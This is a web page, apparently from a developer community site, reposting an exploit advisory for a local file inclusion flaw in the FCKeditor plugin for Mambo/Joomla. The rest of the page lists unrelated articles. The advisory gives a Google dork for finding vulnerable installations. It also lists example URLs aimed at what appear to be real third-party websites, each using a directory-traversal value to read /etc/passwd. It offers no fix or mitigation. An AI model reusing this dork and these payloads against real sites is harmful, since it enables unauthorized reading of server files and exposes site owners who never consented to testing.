AI 助理
备案控制台
开发者社区 安全 文章 正文

Mambo / Joomla FCKEditor Local File Inclusion

2012-09-23 982
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: ##################################################mambo /joomla (fckeditor) lfi Vulnerability... 
##################################################
mambo /joomla (fckeditor) lfi Vulnerability
##################################################

 # Exploit Title :mambo /joomla (fckeditor) lfi Vulnerability
 # Google Dork: /mambots/editors/fckeditor/editor/filemanager/browser/default
 #Author: BHG Security Center
 # Home: http://cc.black-hg.org - http://greyh4t.com/cc/
 # Tested on: [linux+apache]
 # Finder(s):Siavash (morghabi_s@yahoo.com)
 # Examle:
 http://chaboille.voyageur.coop/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../../../../etc/passwd
 http://council.mcsquaredllc.com/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../../../../etc/passwd
 http://www.intexsac.com/espanol/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../../../../etc/passwd
 and more in go0gle
##################################################
[-] Disclosure timeline:

[04/08/2011] - Vulnerabilities discovered
[14/10/2011] - Others vulnerabilities discovered
[15/10/2011] - Issues reported to http://black-hg.org
[04/09/2012] - Public disclosure

# Greets To :
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ G3n3Rall ~ l4tr0d3ctism ~ NoL1m1t

~ Mr.XHat THANKS TO ALL Iranian HackerZ ./Persian Gulf

===========================================[End]============================================= 
文章标签:
安全
cnbird
目录
相关文章
mg的嘟嘟
|
机器学习/深度学习 自然语言处理 算法
基于深度学习的语音识别技术应用与发展
在当今数字化时代,语音识别技术已经成为人机交互领域的重要组成部分。本文将介绍基于深度学习的语音识别技术在智能助手、智能家居和医疗健康等领域的应用与发展,同时探讨该技术在未来的潜在应用和发展方向。
mg的嘟嘟
516 4
aliyun7362823750
|
运维 监控 供应链
如何通过安全看板优化企业安全管理流程?最受欢迎的工具推荐
随着企业对安全管理的重视,特别是在建筑、制造、能源和IT等行业,安全看板工具成为提升管理效率和保障员工安全的关键。这类工具通过可视化安全工作,优化任务分配、进度跟踪和风险识别,简化流程,提高团队响应速度,减少事故,降低成本。文章介绍了安全看板的概念、设计方法、案例及推荐工具(板栗看板、Zoho Projects、Smartsheet、Wrike和Airtable),旨在帮助企业选择合适的工具,提高安全管理效率。
aliyun7362823750
365 1
如何通过安全看板优化企业安全管理流程?最受欢迎的工具推荐
游客x4wok3c7ts5b2
|
12月前
|
监控 搜索推荐 数据挖掘
精准定价与促销:CRM中的价格和折扣管理艺术
在当今竞争激烈的商业环境中,CRM系统是企业维持客户忠诚度和提高销售效率的重要工具。其中,价格和折扣的统一管控尤为关键,直接影响企业的盈利能力和市场竞争力。通过集中管理平台,企业能确保各渠道价格一致,避免混乱,维护品牌形象。合理的折扣政策可吸引新客户,提升老客户复购率。利用数据分析优化价格策略,监控并调整政策效果,确保利润最大化。CRM系统的这些功能有助于控制成本、提高客户满意度,最终实现销售增长和利润提升。
游客x4wok3c7ts5b2
177 0
c的前世今生
|
机器学习/深度学习 物联网 数据处理
C语言用于物联网更合适还是python
选择 C 语言还是 Python 作为物联网(IoT)开发的语言取决于多个因素,包括项目的性质、资源限制、性能需求以及开发团队的技能水平。C 语言性能优越,适合资源受限的嵌入式设备,能直接访问硬件,广泛应用于底层开发,但开发复杂且容易出错。Python 则以其简单的语法和丰富的库支持快速开发和原型制作,适合跨平台应用和数据处理,但性能较低,资源占用较大。根据项目需求,性能和资源要求高时选择 C 语言,需快速开发和易于维护时选择 Python。
c的前世今生
426 7
人物我非-32022
|
机器学习/深度学习 存储 自然语言处理
Adam介绍
【10月更文挑战第3天】
人物我非-32022
1091 1
木鸟杂记
|
机器学习/深度学习 Web App开发 分布式计算
继Spark之后,UC Berkeley 推出新一代高性能深度学习引擎——Ray(1)
继Spark之后,UC Berkeley 推出新一代高性能深度学习引擎——Ray(1)
木鸟杂记
631 0
继Spark之后,UC Berkeley 推出新一代高性能深度学习引擎——Ray(1)
龙大吉
|
弹性计算 运维 负载均衡
【阿里云弹性计算】阿里云ECS在金融科技中的应用案例:高性能交易系统的构建
【5月更文挑战第27天】阿里云ECS助力某证券公司构建高性能交易系统,满足高并发、高可用和弹性扩展需求。ECS凭借最新处理器技术、高速内存实现高性能计算;支持多地域、多可用区部署保证高可用性;弹性伸缩特性适应业务波动,降低运维成本。通过分布式架构和负载均衡技术,实现交易请求高效处理,确保系统稳定运行。案例证明,阿里云ECS是金融科技领域构建高性能交易系统的理想选择。
龙大吉
459 1
一只牛博
|
存储 安全 应用服务中间件
解密Nginx限流机制:有效应对DDoS攻击与高并发流量
解密Nginx限流机制:有效应对DDoS攻击与高并发流量
一只牛博
537 0
开发者小助理
|
运维 新能源 数据处理
2022云栖精选—《云上新型电力系统白皮书》发布
摘要:本文整理自阿里云智能电力行业总经理吴明宸,在云栖大会的分享。本篇内容主要分为两个部分: 1. 白皮书发布背景 2. 白皮书内容简介
开发者小助理
1303 0
2022云栖精选—《云上新型电力系统白皮书》发布
江池俊
|
Linux 程序员 编译器
【C语言】Sleep()函数----详解
【C语言】Sleep()函数----详解
江池俊
995 0